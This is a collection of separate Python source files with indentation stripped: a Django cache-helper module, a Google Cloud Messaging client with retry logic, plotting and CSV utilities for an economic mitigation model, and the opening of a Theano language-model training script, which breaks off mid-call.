global remote_cache_time_start
remote_cache_total_requests += 1
remote_cache_total_time += (time.time() - remote_cache_time_start)
def get_or_create_key_prefix():
# type: () -> str
if settings.TEST_SUITE:
# This sets the prefix mostly for the benefit of the JS tests.
# The Python tests overwrite KEY_PREFIX on each test.
return 'test_suite:' + str(os.getpid()) + ':'
filename = os.path.join(settings.DEPLOY_ROOT, "remote_cache_prefix")
try:
fd = os.open(filename, os.O_CREAT | os.O_EXCL | os.O_RDWR, 0o444)
prefix = base64.b16encode(hashlib.sha256(str(random.getrandbits(256))).digest())[:32].lower() + ':'
# This does close the underlying file
with os.fdopen(fd, 'w') as f:
f.write(prefix + "\n")
except OSError:
# The file already exists
tries = 1
while tries < 10:
with open(filename, 'r') as f:
prefix = f.readline()[:-1]
if len(prefix) == 33:
break
tries += 1
prefix = ''
time.sleep(0.5)
if not prefix:
print("Could not read remote cache key prefix file")
sys.exit(1)
return prefix
KEY_PREFIX = get_or_create_key_prefix() # type: str
def bounce_key_prefix_for_testing(test_name):
# type: (str) -> None
global KEY_PREFIX
KEY_PREFIX = test_name + ':' + str(os.getpid()) + ':'
def get_cache_backend(cache_name):
# type: (str) -> get_cache
if cache_name is None:
return djcache
return get_cache(cache_name)
def cache_with_key(keyfunc, cache_name=None, timeout=None, with_statsd_key=None):
# type: ignore # CANNOT_INFER_LAMBDA_TYPE issue with models.py
"""Decorator which applies Django caching to a function.
Decorator argument is a function which computes a cache key
from the original function's arguments. You are responsible
for avoiding collisions with other uses of this decorator or
other uses of caching."""
def decorator(func):
# type: (Callable[..., Any]) -> (Callable[..., Any])
@wraps(func)
def func_with_caching(*args, **kwargs):
# type: (*Any, **Any) -> Callable[..., Any]
key = keyfunc(*args, **kwargs)
val = cache_get(key, cache_name=cache_name)
extra = ""
if cache_name == 'database':
extra = ".dbcache"
if with_statsd_key is not None:
metric_key = with_statsd_key
else:
metric_key = statsd_key(key)
status = "hit" if val is not None else "miss"
statsd.incr("cache%s.%s.%s" % (extra, metric_key, status))
# Values are singleton tuples so that we can distinguish
# a result of None from a missing key.
if val is not None:
return val[0]
val = func(*args, **kwargs)
cache_set(key, val, cache_name=cache_name, timeout=timeout)
return val
return func_with_caching
return decorator
def cache_set(key, val, cache_name=None, timeout=None):
# type: (str, Any, Optional[str], Optional[int]) -> Any
remote_cache_stats_start()
cache_backend = get_cache_backend(cache_name)
ret = cache_backend.set(KEY_PREFIX + key, (val,), timeout=timeout)
remote_cache_stats_finish()
return ret
def cache_get(key, cache_name=None):
# type: (str, Optional[str]) -> Any
remote_cache_stats_start()
cache_backend = get_cache_backend(cache_name)
ret = cache_backend.get(KEY_PREFIX + key)
remote_cache_stats_finish()
return ret
def cache_get_many(keys, cache_name=None):
# type: (List[str], Optional[str]) -> Dict[str, Any]
keys = [KEY_PREFIX + key for key in keys]
remote_cache_stats_start()
ret = get_cache_backend(cache_name).get_many(keys)
remote_cache_stats_finish()
return dict([(key[len(KEY_PREFIX):], value) for key, value in ret.items()])
def cache_set_many(items, cache_name=None, timeout=None):
# type: (Dict[str, Any], Optional[str], Optional[int]) -> Any
new_items = {}
for key in items:
new_items[KEY_PREFIX + key] = items[key]
items = new_items
remote_cache_stats_start()
ret = get_cache_backend(cache_name).set_many(items, timeout=timeout)
remote_cache_stats_finish()
return ret
def cache_delete(key, cache_name=None):
# type: (str, Optional[str]) -> None
remote_cache_stats_start()
get_cache_backend(cache_name).delete(KEY_PREFIX + key)
remote_cache_stats_finish()
def cache_delete_many(items, cache_name=None):
# type: (Iterable[str], Optional[str]) -> None
remote_cache_stats_start()
get_cache_backend(cache_name).delete_many(
KEY_PREFIX + item for item in items)
remote_cache_stats_finish()
# Required Arguments are as follows:
# * object_ids: The list of object ids to look up
# * cache_key_function: object_id => cache key
# * query_function: [object_ids] => [objects from database]
# Optional keyword arguments:
# * setter: Function to call before storing items to cache (e.g. compression)
# * extractor: Function to call on items returned from cache
# (e.g. decompression). Should be the inverse of the setter
# function.
# * id_fetcher: Function mapping an object from database => object_id
# (in case we're using a key more complex than obj.id)
# * cache_transformer: Function mapping an object from database =>
# value for cache (in case the values that we're caching are some
# function of the objects, not the objects themselves)
def generic_bulk_cached_fetch(cache_key_function, query_function, object_ids,
extractor=lambda obj: obj,
setter=lambda obj: obj,
id_fetcher=lambda obj: obj.id,
cache_transformer=lambda obj: obj):
# type: (Callable[[Any], str], Callable[[List[int]], List[Any]], List[int], Callable[[Any], Any], Callable[[Any], Any], Callable[[Any], Any], Callable[[Any], Any]) -> Dict[int, Any]
cache_keys = {} # type: Dict[int, str]
for object_id in object_ids:
cache_keys[object_id] = cache_key_function(object_id)
cached_objects = cache_get_many([cache_keys[object_id]
for object_id in object_ids])
for (key, val) in cached_objects.items():
cached_objects[key] = extractor(cached_objects[key][0])
needed_ids = [object_id for object_id in object_ids if
cache_keys[object_id] not in cached_objects]
db_objects = query_function(needed_ids)
items_for_remote_cache = {} # type: Dict[str, Any]
for obj in db_objects:
key = cache_keys[id_fetcher(obj)]
item = cache_transformer(obj)
items_for_remote_cache[key] = (setter(item),)
cached_objects[key] = item
if len(items_for_remote_cache) > 0:
cache_set_many(items_for_remote_cache)
return dict((object_id, cached_objects[cache_keys[object_id]]) for object_id in object_ids
if cache_keys[object_id] in cached_objects)
def cache(func):
# type: ignore # CANNOT_INFER_FUNC_TYPE
"""Decorator which applies Django caching to a function.
Uses a key based on the function's name, filename, and
the repr() of its arguments."""
func_uniqifier = '%s-%s' % (func.__code__.co_filename, func.__name__)
@wraps(func)
def keyfunc(*args, **kwargs):
# type: (*Any, **Any) -> str
# Django complains about spaces because memcached rejects them
key = func_uniqifier + repr((args, kwargs))
return key.replace('-', '--').replace(' ', '-s')
return cache_with_key(keyfunc)(func)
def message_cache_key(message_id):
# type: (int) -> str
return "message:%d" % (message_id,)
def display_recipient_cache_key(recipient_id):
# type: (int) -> str
return "display_recipient_dict:%d" % (recipient_id,)
def user_profile_by_email_cache_key(email):
# type: (str) -> str
# See the comment in zerver/lib/avatar.py:gravatar_hash for why we
# are proactively encoding email addresses even though they will
# with high likelihood be ASCII-only for the foreseeable future.
return 'user_profile_by_email:%s' % (make_safe_digest(email.strip()),)
def user_profile_by_id_cache_key(user_profile_id):
# type: (int) -> str
return "user_profile_by_id:%s" % (user_profile_id,)
# TODO: Refactor these cache helpers into another file that can import
# models.py so that we can replace many of these type: Anys
def cache_save_user_profile(user_profile):
# type: (Any) -> None
cache_set(user_profile_by_id_cache_key(user_profile.id), user_profile, timeout=3600*24*7)
active_user_dict_fields = ['id', 'full_name', 'short_name', 'email', 'is_realm_admin', 'is_bot'] # type: List[str]
def active_user_dicts_in_realm_cache_key(realm):
# type: (Any) -> str
return "active_user_dicts_in_realm:%s" % (realm.id,)
active_bot_dict_fields = ['id', 'full_name', 'short_name',
'email', 'default_sending_stream__name',
'default_events_register_stream__name',
'default_all_public_streams', 'api_key',
'bot_owner__email', 'avatar_source'] # type: List[str]
def active_bot_dicts_in_realm_cache_key(realm):
# type: (Any) -> str
return "active_bot_dicts_in_realm:%s" % (realm.id,)
def get_stream_cache_key(stream_name, realm):
# type: (str, Any) -> str
from zerver.models import Realm
if isinstance(realm, Realm):
realm_id = realm.id
else:
realm_id = realm
return "stream_by_realm_and_name:%s:%s" % (
realm_id, make_safe_digest(stream_name.strip().lower()))
def update_user_profile_caches(user_profiles):
# type: (Iterable[Any]) -> Any
items_for_remote_cache = {}
for user_profile in user_profiles:
items_for_remote_cache[user_profile_by_email_cache_key(user_profile.email)] = (user_profile,)
items_for_remote_cache[user_profile_by_id_cache_key(user_profile.id)] = (user_profile,)
cache_set_many(items_for_remote_cache)
# Called by models.py to flush the user_profile cache whenever we save
# a user_profile object
def flush_user_profile(sender, **kwargs):
# type: (Any, **Any) -> None
user_profile = kwargs['instance']
update_user_profile_caches([user_profile])
# Invalidate our active_users_in_realm info dict if any user has changed
# the fields in the dict or become (in)active
if kwargs.get('update_fields') is None or \
len(set(active_user_dict_fields + ['is_active']) & set(kwargs['update_fields'])) > 0:
cache_delete(active_user_dicts_in_realm_cache_key(user_profile.realm))
# Invalidate our active_bots_in_realm info dict if any bot has
# changed the fields in the dict or become (in)active
if user_profile.is_bot and (kwargs['update_fields'] is None or
(set(active_bot_dict_fields + ['is_active']) &
set(kwargs['update_fields']))):
cache_delete(active_bot_dicts_in_realm_cache_key(user_profile.realm))
# Invalidate realm-wide alert words cache if any user in the realm has changed
# alert words
if kwargs.get('update_fields') is None or "alert_words" in kwargs['update_fields']:
cache_delete(realm_alert_words_cache_key(user_profile.realm))
# Called by models.py to flush various caches whenever we save
# a Realm object. The main tricky thing here is that Realm info is
# generally cached indirectly through user_profile objects.
def flush_realm(sender, **kwargs):
# type: (Any, **Any) -> None
realm = kwargs['instance']
users = realm.get_active_users()
update_user_profile_caches(users)
if realm.deactivated:
cache_delete(active_user_dicts_in_realm_cache_key(realm))
cache_delete(active_bot_dicts_in_realm_cache_key(realm))
cache_delete(realm_alert_words_cache_key(realm))
def realm_alert_words_cache_key(realm):
# type: (Any) -> str
return "realm_alert_words:%s" % (realm.domain,)
# Called by models.py to flush the stream cache whenever we save a stream
# object.
def flush_stream(sender, **kwargs):
# type: (Any, **Any) -> None
from zerver.models import UserProfile
stream = kwargs['instance']
items_for_remote_cache = {}
items_for_remote_cache[get_stream_cache_key(stream.name, stream.realm)] = (stream,)
cache_set_many(items_for_remote_cache)
if kwargs.get('update_fields') is None or 'name' in kwargs['update_fields'] and \
UserProfile.objects.filter(
Q(default_sending_stream=stream) |
Q(default_events_register_stream=stream)
).exists():
cache_delete(active_bot_dicts_in_realm_cache_key(stream.realm))
|
|
import requests
import json
from collections import defaultdict
import time
import random
from sys import version_info
import logging
import re
if version_info.major == 2:
from urllib2 import unquote
else:
from urllib.parse import unquote
GCM_URL = 'https://gcm-http.googleapis.com/gcm/send'
class GCMException(Exception):
pass
class GCMMalformedJsonException(GCMException):
pass
class GCMConnectionException(GCMException):
pass
class GCMAuthenticationException(GCMException):
pass
class GCMTooManyRegIdsException(GCMException):
pass
class GCMInvalidTtlException(GCMException):
pass
class GCMTopicMessageException(GCMException):
pass
# Exceptions from Google responses
class GCMMissingRegistrationException(GCMException):
pass
class GCMMismatchSenderIdException(GCMException):
pass
class GCMNotRegisteredException(GCMException):
pass
class GCMMessageTooBigException(GCMException):
pass
class GCMInvalidRegistrationException(GCMException):
pass
class GCMUnavailableException(GCMException):
pass
class GCMInvalidInputException(GCMException):
pass
# TODO: Refactor this to be more human-readable
# TODO: Use OrderedDict for the result type to be able to preserve the order of the messages returned by GCM server
def group_response(response, registration_ids, key):
# Pair up results and reg_ids
mapping = zip(registration_ids, response['results'])
# Filter by key
filtered = ((reg_id, res[key]) for reg_id, res in mapping if key in res)
# Grouping of errors and mapping of ids
if key in ['registration_id', 'message_id']:
grouping = dict(filtered)
else:
grouping = defaultdict(list)
for k, v in filtered:
grouping[v].append(k)
return grouping or None
def get_retry_after(response_headers):
retry_after = response_headers.get('Retry-After')
if retry_after:
# Parse from seconds (e.g. Retry-After: 120)
if type(retry_after) is int:
return retry_after
# Parse from HTTP-Date (e.g. Retry-After: Fri, 31 Dec 1999 23:59:59 GMT)
else:
try:
from email.utils import parsedate
from calendar import timegm
return timegm(parsedate(retry_after))
except (TypeError, OverflowError, ValueError):
return None
return None
class Payload(object):
"""
Base Payload class which prepares data for HTTP requests
"""
# TTL in seconds
GCM_TTL = 2419200
topicPattern = re.compile('/topics/[a-zA-Z0-9-_.~%]+')
def __init__(self, **kwargs):
self.validate(kwargs)
self.__dict__.update(**kwargs)
def validate(self, options):
"""
Allow adding validation on each payload key
by defining `validate_{key_name}`
"""
for key, value in options.items():
validate_method = getattr(self, 'validate_%s' % key, None)
if validate_method:
validate_method(value)
def validate_time_to_live(self, value):
if not (0 <= value <= self.GCM_TTL):
raise GCMInvalidTtlException("Invalid time to live value")
def validate_registration_ids(self, registration_ids):
if len(registration_ids) > 1000:
raise GCMTooManyRegIdsException("Exceded number of registration_ids")
def validate_to(self, value):
if not re.match(Payload.topicPattern, value):
raise GCMInvalidInputException(
"Invalid topic name: {0}! Does not match the {1} pattern".format(value, Payload.topicPattern))
@property
def body(self):
raise NotImplementedError
class PlaintextPayload(Payload):
@property
def body(self):
# Safeguard for backwards compatibility
if 'registration_id' not in self.__dict__:
self.__dict__['registration_id'] = self.__dict__.pop(
'registration_ids', None
)
# Inline data for for plaintext request
data = self.__dict__.pop('data')
for key, value in data.items():
self.__dict__['data.%s' % key] = value
return self.__dict__
class JsonPayload(Payload):
@property
def body(self):
return json.dumps(self.__dict__)
class GCM(object):
# Timeunit is milliseconds.
BACKOFF_INITIAL_DELAY = 1000
MAX_BACKOFF_DELAY = 1024000
logger = None
logging_handler = None
def __init__(self, api_key, proxy=None, timeout=None, debug=False):
""" api_key : google api key
url: url of gcm service.
proxy: can be string "http://host:port" or dict {'https':'host:port'}
timeout: timeout for every HTTP request, see 'requests' documentation for possible values.
"""
self.api_key = api_key
self.url = GCM_URL
if isinstance(proxy, str):
protocol = self.url.split(':')[0]
self.proxy = {protocol: proxy}
else:
self.proxy = proxy
self.timeout = timeout
self.debug = debug
self.retry_after = None
if self.debug:
GCM.enable_logging()
@staticmethod
def enable_logging(level=logging.DEBUG, handler=None):
"""
Helper for quickly adding a StreamHandler to the logger. Useful for debugging.
:param handler:
:param level:
:return: the handler after adding it
"""
if not handler:
# Use a singleton logging_handler instead of recreating it,
# so we can remove-and-re-add safely without having duplicate handlers
if GCM.logging_handler is None:
GCM.logging_handler = logging.StreamHandler()
GCM.logging_handler.setFormatter(logging.Formatter(
'[%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(funcName)s()] %(message)s'))
handler = GCM.logging_handler
GCM.logger = logging.getLogger(__name__)
GCM.logger.removeHandler(handler)
GCM.logger.addHandler(handler)
GCM.logger.setLevel(level)
GCM.log('Added a stderr logging handler to logger: {0}', __name__)
# Enable requests logging
requests_logger_name = 'requests.packages.urllib3'
requests_logger = logging.getLogger(requests_logger_name)
requests_logger.removeHandler(handler)
requests_logger.addHandler(handler)
requests_logger.setLevel(level)
GCM.log('Added a stderr logging handler to logger: {0}', requests_logger_name)
@staticmethod
def log(message, *data):
if GCM.logger and message:
GCM.logger.debug(message.format(*data))
@staticmethod
def construct_payload(**kwargs):
"""
Construct the dictionary mapping of parameters.
Encodes the dictionary into JSON if for json requests.
:return constructed dict or JSON payload
:raises GCMInvalidTtlException: if time_to_live is invalid
"""
is_json = kwargs.pop('is_json', True)
if is_json:
if 'topic' not in kwargs and 'registration_ids' not in kwargs:
raise GCMMissingRegistrationException("Missing registration_ids or topic")
elif 'topic' in kwargs and 'registration_ids' in kwargs:
raise GCMInvalidInputException(
"Invalid parameters! Can't have both 'registration_ids' and 'to' as input parameters")
if 'topic' in kwargs:
kwargs['to'] = '/topics/{}'.format(kwargs.pop('topic'))
elif 'registration_ids' not in kwargs:
raise GCMMissingRegistrationException("Missing registration_ids")
payload = JsonPayload(**kwargs).body
else:
payload = PlaintextPayload(**kwargs).body
return payload
def make_request(self, data, is_json=True, session=None):
"""
Makes a HTTP request to GCM servers with the constructed payload
:param data: return value from construct_payload method
:param session: requests.Session object to use for request (optional)
:raises GCMMalformedJsonException: if malformed JSON request found
:raises GCMAuthenticationException: if there was a problem with authentication, invalid api key
:raises GCMConnectionException: if GCM is screwed
"""
headers = {
'Authorization': 'key=%s' % self.api_key,
}
if is_json:
headers['Content-Type'] = 'application/json'
else:
headers['Content-Type'] = 'application/x-www-form-urlencoded;charset=UTF-8'
GCM.log('Request URL: {0}', self.url)
GCM.log('Request headers: {0}', headers)
GCM.log('Request proxy: {0}', self.proxy)
GCM.log('Request timeout: {0}', self.timeout)
GCM.log('Request data: {0}', data)
GCM.log('Request is_json: {0}', is_json)
new_session = None
if not session:
session = new_session = requests.Session()
try:
response = session.post(
self.url, data=data, headers=headers,
proxies=self.proxy, timeout=self.timeout,
)
finally:
if new_session:
new_session.close()
GCM.log('Response status: {0} {1}', response.status_code, response.reason)
GCM.log('Response headers: {0}', response.headers)
GCM.log('Response data: {0}', response.text)
# 5xx or 200 + error:Unavailable
self.retry_after = get_retry_after(response.headers)
# Successful response
if response.status_code == 200:
if is_json:
response = response.json()
else:
response = response.content
return response
# Failures
if response.status_code == 400:
raise GCMMalformedJsonException(
"The request could not be parsed as JSON")
elif response.status_code == 401:
raise GCMAuthenticationException(
"There was an error authenticating the sender account")
elif response.status_code == 503:
raise GCMUnavailableException("GCM service is unavailable")
else:
error = "GCM service error: %d" % response.status_code
raise GCMUnavailableException(error)
@staticmethod
def raise_error(error):
if error == 'InvalidRegistration':
raise GCMInvalidRegistrationException("Registration ID is invalid")
elif error == 'Unavailable':
# Plain-text requests will never return Unavailable as the error code.
# http://developer.android.com/guide/google/gcm/gcm.html#error_codes
raise GCMUnavailableException(
"Server unavailable. Resent the message")
elif error == 'NotRegistered':
raise GCMNotRegisteredException(
"Registration id is not valid anymore")
elif error == 'MismatchSenderId':
raise GCMMismatchSenderIdException(
"A Registration ID is tied to a certain group of senders")
elif error == 'MessageTooBig':
raise GCMMessageTooBigException("Message can't exceed 4096 bytes")
elif error == 'MissingRegistration':
raise GCMMissingRegistrationException("Missing registration")
def handle_plaintext_response(self, response):
if type(response) not in [bytes, str]:
raise TypeError("Invalid type for response parameter! Expected: bytes or str. "
"Actual: {0}".format(type(response).__name__))
# Split response by line
if version_info.major == 3 and type(response) is bytes:
response = response.decode("utf-8", "strict")
response_lines = response.strip().split('\n')
# Split the first line by =
key, value = response_lines[0].split('=')
# Error on first line
if key == 'Error':
self.raise_error(value)
else: # Canonical_id from the second line
if len(response_lines) == 2:
return unquote(response_lines[1].split('=')[1])
return None # TODO: Decide a way to return message id without breaking backwards compatibility
# unquote(value) # ID of the sent message (from the first line)
@staticmethod
def handle_json_response(response, registration_ids):
errors = group_response(response, registration_ids, 'error')
canonical = group_response(response, registration_ids, 'registration_id')
success = group_response(response, registration_ids, 'message_id')
info = {}
if errors:
info.update({'errors': errors})
if canonical:
info.update({'canonical': canonical})
if success:
info.update({'success': success})
return info
@staticmethod
def handle_topic_response(response):
error = response.get('error')
if error:
raise GCMTopicMessageException(error)
return response['message_id']
@staticmethod
def extract_unsent_reg_ids(info):
if 'errors' in info and 'Unavailable' in info['errors']:
return info['errors']['Unavailable']
return []
def plaintext_request(self, **kwargs):
"""
Makes a plaintext request to GCM servers
:return dict of response body from Google including multicast_id, success, failure, canonical_ids, etc
"""
if 'registration_id' not in kwargs:
raise GCMMissingRegistrationException("Missing registration_id")
elif not kwargs['registration_id']:
raise GCMMissingRegistrationException("Empty registration_id")
kwargs['is_json'] = False
retries = kwargs.pop('retries', 5)
session = kwargs.pop('session', None)
payload = self.construct_payload(**kwargs)
backoff = self.BACKOFF_INITIAL_DELAY
info = None
has_error = False
for attempt in range(retries):
try:
response = self.make_request(payload, is_json=False, session=session)
info = self.handle_plaintext_response(response)
has_error = False
except GCMUnavailableException:
has_error = True
if self.retry_after:
GCM.log("[plaintext_request - Attempt #{0}] Retry-After ~> Sleeping for {1} seconds".format(attempt,
self.retry_after))
time.sleep(self.retry_after)
self.retry_after = None
elif has_error:
sleep_time = backoff / 2 + random.randrange(backoff)
nap_time = float(sleep_time) / 1000
GCM.log(
"[plaintext_request - Attempt #{0}]Backoff ~> Sleeping for {1} seconds".format(attempt, nap_time))
time.sleep(nap_time)
if 2 * backoff < self.MAX_BACKOFF_DELAY:
backoff *= 2
else:
break
if has_error:
raise IOError("Could not make request after %d attempts" % retries)
return info
def json_request(self, **kwargs):
"""
Makes a JSON request to GCM servers
:param kwargs: dict mapping of key-value pairs of parameters
:return dict of response body from Google including multicast_id, success, failure, canonical_ids, etc
"""
if 'registration_ids' not in kwargs:
raise GCMMissingRegistrationException("Missing registration_ids")
elif not kwargs['registration_ids']:
raise GCMMissingRegistrationException("Empty registration_ids")
args = dict(**kwargs)
retries = args.pop('retries', 5)
session = args.pop('session', None)
payload = self.construct_payload(**args)
registration_ids = args['registration_ids']
backoff = self.BACKOFF_INITIAL_DELAY
info = None
has_error = False
for attempt in range(retries):
try:
response = self.make_request(payload, is_json=True, session=session)
info = self.handle_json_response(response, registration_ids)
unsent_reg_ids = self.extract_unsent_reg_ids(info)
has_error = False
except GCMUnavailableException:
unsent_reg_ids = registration_ids
has_error = True
if unsent_reg_ids:
registration_ids = unsent_reg_ids
# Make the retry request with the unsent registration ids
args['registration_ids'] = registration_ids
payload = self.construct_payload(**args)
if self.retry_after:
GCM.log("[json_request - Attempt #{0}] Retry-After ~> Sleeping for {1}".format(attempt,
self.retry_after))
time.sleep(self.retry_after)
self.retry_after = None
else:
sleep_time = backoff / 2 + random.randrange(backoff)
nap_time = float(sleep_time) / 1000
GCM.log("[json_request - Attempt #{0}] Backoff ~> Sleeping for {1}".format(attempt, nap_time))
time.sleep(nap_time)
if 2 * backoff < self.MAX_BACKOFF_DELAY:
backoff *= 2
else:
break
if has_error:
raise IOError("Could not make request after %d attempts" % retries)
return info
def send_downstream_message(self, **kwargs):
return self.json_request(**kwargs)
def send_topic_message(self, **kwargs):
"""
Publish Topic Messaging to GCM servers
Ref: https://developers.google.com/cloud-messaging/topic-messaging
:param kwargs: dict mapping of key-value pairs of parameters
:return message_id
:raises GCMInvalidInputException: if the topic is empty
"""
if 'topic' not in kwargs:
raise GCMInvalidInputException("Topic name missing!")
elif not kwargs['topic']:
raise GCMInvalidInputException("Topic name cannot be empty!")
retries = kwargs.pop('retries', 5)
session = kwargs.pop('session', None)
payload = self.construct_payload(**kwargs)
backoff = self.BACKOFF_INITIAL_DELAY
for attempt in range(retries):
try:
response = self.make_request(payload, is_json=True, session=session)
return self.handle_topic_response(response)
except (GCMUnavailableException, GCMTopicMessageException):
if self.retry_after:
GCM.log("[send_topic_message - Attempt #{0}] Retry-After ~> Sleeping for {1}"
.format(attempt, self.retry_after))
time.sleep(self.retry_after)
self.retry_after = None
else:
sleep_time = backoff / 2 + random.randrange(backoff)
nap_time = float(sleep_time) / 1000
GCM.log("[send_topic_message - Attempt #{0}] Backoff ~> Sleeping for {1}".format(attempt, nap_time))
time.sleep(nap_time)
if 2 * backoff < self.MAX_BACKOFF_DELAY:
backoff *= 2
raise IOError("Could not make request after %d attempts" % retries)
|
|
import numpy as np
import csv
################
### Plotting ###
################
markers = (u'o', u'v', u'^', u'<', u'>', u'8', u's', u'p', u'*', u'h', u'H', u'D', u'd')
def plot(y_data, x_data, index=None, y_index=None, title=None, xlabel=None, ylabel=None,
legend=None, vertical_line=None, save=False, file_name=None, points=False):
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style("whitegrid", {"font.family": [u'Bitstream Vera Sans']})
sns.set_palette("PuBuGn_d")
#sns.set_palette("RdBu_r")
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
if len(y_data.shape)==1:
ax.plot(x_data, y_data, label=legend)
if points:
ax.scatter(x_data, y_data)
else:
for i in range(len(y_data)):
ax.plot(x_data, y_data[i], label=legend[i])
if points:
ax.plot(x_data, y_data[i], markers[i])
ax.xaxis.grid(False)
if vertical_line is not None:
ax.axvline(x=vertical_line, linestyle='dashed', linewidth=1, color='black')
if index is not None:
ax.set_xticklabels(index)
if y_index is not None:
ax.set_yticklabels(y_index)
if title is not None:
ax.set_title(title, fontsize='large')
if xlabel is not None:
ax.set_xlabel(xlabel, fontsize='large')
if ylabel is not None:
ax.set_ylabel(ylabel, fontsize='large')
if legend is not None:
plt.legend(fontsize='large', loc='best')
ymin, ymax = ax.get_ylim()
diff = ymax - ymin
ax.set_ylim(ymin-diff*0.1, ymax+diff*0.1)
if save:
d = find_path(file_name, "plots", ".png")
plt.savefig(d)
plt.close(fig)
plt.show()
def plot_dict(dictionary, title, xlabel, ylabel):
y_data, x_data = dictionary.items()
plot(y_data, x_data, title=title, xlabel=xlabel, ylabel=ylabel)
def plot_mitigation_at_node(m, node, utility, save=False, prefix=""):
m_copy = m.copy()
x = np.append(np.linspace(0.0, m[node], 25), np.linspace(m[node], m[node]+0.05, 25))
x = np.unique(x)
y = np.zeros(len(x))
for i in range(len(x)):
m_copy[node] = x[i]
y[i] = utility.utility(m_copy)
plot(y, x, title="Utility vs. Mitigation in Node {}".format(node), xlabel="Mitigation",
ylabel="Utility", vertical_line=m[node], save=save, file_name=prefix+"MAT_{}".format(node))
def change_mitigation(m, u, add_nodes, reduce_nodes, delta):
m_copy = m.copy()
cache = set()
for node in add_nodes:
m_copy[node] += 0.01
cache.add(node)
wec, bec = u.tree.reachable_end_states(node)
for next_node in range(31+wec, 32+bec):
if next_node not in cache:
m_copy[next_node] += delta
cache.add(next_node)
else:
print(next_node)
for node in reduce_nodes:
m_copy[node] -= 0.01
cache.add(node)
wec, bec = u.tree.reachable_end_states(node)
for next_node in range(31+wec, 32+bec):
if next_node not in cache:
m_copy[next_node] -= delta
cache.add(next_node)
else:
print(next_node)
return m_copy
def marginal_analysis(m, u, add_nodes, reduce_nodes, delta):
utility_t, cons_t, cost_t, ce_t = u.utility(m, return_trees=True)
new_m = change_mitigation(m, u, add_nodes, reduce_nodes, delta)
new_utility_t, new_cons_t, new_cost_t, new_ce_t = u.utility(new_m, return_trees=True)
for period in cost_t.periods:
new_utility_t.tree[period] -= utility_t[period]
new_cons_t.tree[period] -= cons_t[period]
new_cost_t.tree[period] -= cost_t[period]
return new_utility_t, new_cons_t, new_cost_t
def plot_first_order_condition(m, node, utility):
x = np.array([1.0/(10)**i for i in range(1, 11)])
y = np.zeros(len(x))
for i in range(len(x)):
grad, k = utility.partial_grad(m, node, x[i])
y[i] = grad
plot(y, x, title="First Order Check for node {}".format(node), xlabel="Delta",
ylabel="Partial deriv. w.r.t. Mitigation")
###########
### I/O ###
###########
def find_path(file_name, directory="data", file_type=".csv"):
import os
cwd = os.getcwd()
if not os.path.exists(directory):
os.makedirs(directory)
d = os.path.join(cwd, os.path.join(directory,file_name+file_type))
return d
def create_file(file_name):
import os
d = find_path(file_name)
if not os.path.isfile(d):
open(d, 'w').close()
return d
def file_exists(file_name):
import os
d = find_path(file_name)
return os.path.isfile(d)
def load_csv(file_name, delimiter=';', comment=None):
d = find_path(file_name)
pass
def write_columns_csv(lst, file_name, header=[], index=None, start_char=None, delimiter=';', open_as='wb'):
d = find_path(file_name)
if index is not None:
index.extend(lst)
output_lst = zip(*index)
else:
output_lst = zip(*lst)
with open(d, open_as) as f:
writer = csv.writer(f, delimiter=delimiter)
if start_char is not None:
writer.writerow([start_char])
if header:
writer.writerow(header)
for row in output_lst:
writer.writerow(row)
def write_columns_to_existing(lst, file_name, header="", delimiter=';'):
d = find_path(file_name)
with open(d, 'r') as finput:
reader = csv.reader(finput, delimiter=delimiter)
all_lst = []
row = next(reader)
nested_list = isinstance(lst[0], list) or isinstance(lst[0], np.ndarray)
if nested_list:
lst = zip(*lst)
row.extend(header)
else:
row.append(header)
all_lst.append(row)
n = len(lst)
i = 0
for row in reader:
if nested_list:
row.extend(lst[i])
else:
row.append(lst[i])
all_lst.append(row)
i += 1
with open(d, 'w') as foutput:
writer = csv.writer(foutput, delimiter=delimiter)
writer.writerows(all_lst)
def append_to_existing(lst, file_name, header="", index=None, delimiter=';', start_char=None):
write_columns_csv(lst, file_name, header, index, start_char=start_char, delimiter=delimiter, open_as='a')
import csv
def import_csv(file_name, delimiter=';', header=True, indices=None, start_at=0, break_at='\n', ignore=""):
d = find_path(file_name)
input_lst = []
indices_lst = []
with open(d, 'r') as f:
reader = csv.reader(f, delimiter=delimiter)
for _ in range(0, start_at):
next(reader)
if header:
header_row = next(reader)
for row in reader:
if row[0] == break_at:
break
if row[0] == ignore:
continue
if indices:
input_lst.append(row[indices:])
indices_lst.append(row[:indices])
else:
input_lst.append(row)
if header and not indices :
return header_row, np.array(input_lst, dtype="float64")
elif header and indices:
return header_row[indices:], indices_lst, np.array(input_lst, dtype="float64")
return np.array(input_lst, dtype="float64")
##########
### MP ###
##########
def _pickle_method(method):
func_name = method.im_func.__name__
obj = method.im_self
cls = method.im_class
if func_name.startswith('__') and not func_name.endswith('__'): #deal with mangled names
cls_name = cls.__name__.lstrip('_')
func_name = '_' + cls_name + func_name
return _unpickle_method, (func_name, obj, cls)
def _unpickle_method(func_name, obj, cls):
for cls in cls.__mro__:
try:
func = cls.__dict__[func_name]
except KeyError:
pass
else:
break
return func.__get__(obj, cls)
|
|
"""
Test of the classical LM model for language modelling
"""
from groundhog.datasets import LMIterator
from groundhog.trainer.SGD_momentum import SGD as SGD_m
from groundhog.trainer.SGD import SGD
from groundhog.mainLoop import MainLoop
from groundhog.layers import MultiLayer, \
RecurrentMultiLayer, \
RecurrentMultiLayerInp, \
RecurrentMultiLayerShortPath, \
RecurrentMultiLayerShortPathInp, \
RecurrentMultiLayerShortPathInpAll, \
SoftmaxLayer, \
LastState,\
UnaryOp, \
Operator, \
Shift, \
GaussianNoise, \
SigmoidLayer
from groundhog.layers import maxpool, \
maxpool_ntimes, \
last, \
last_ntimes,\
tanh, \
sigmoid, \
rectifier,\
hard_sigmoid, \
hard_tanh
from groundhog.models import LM_Model
from theano import scan
import numpy
import theano
import theano.tensor as TT
linear = lambda x:x
theano.config.allow_gc = False
def get_text_data(state):
def out_format (x, y, r):
return {'x':x, 'y' :y, 'reset': r}
def out_format_valid (x, y, r):
return {'x':x, 'y' :y, 'reset': r}
train_data = LMIterator(
batch_size=state['bs'],
path = state['path'],
stop=-1,
seq_len = state['seqlen'],
mode="train",
chunks=state['chunks'],
shift = state['shift'],
output_format = out_format,
can_fit=True)
valid_data = LMIterator(
batch_size=state['bs'],
path=state['path'],
stop=-1,
use_infinite_loop=False,
allow_short_sequences = True,
seq_len= state['seqlen'],
mode="valid",
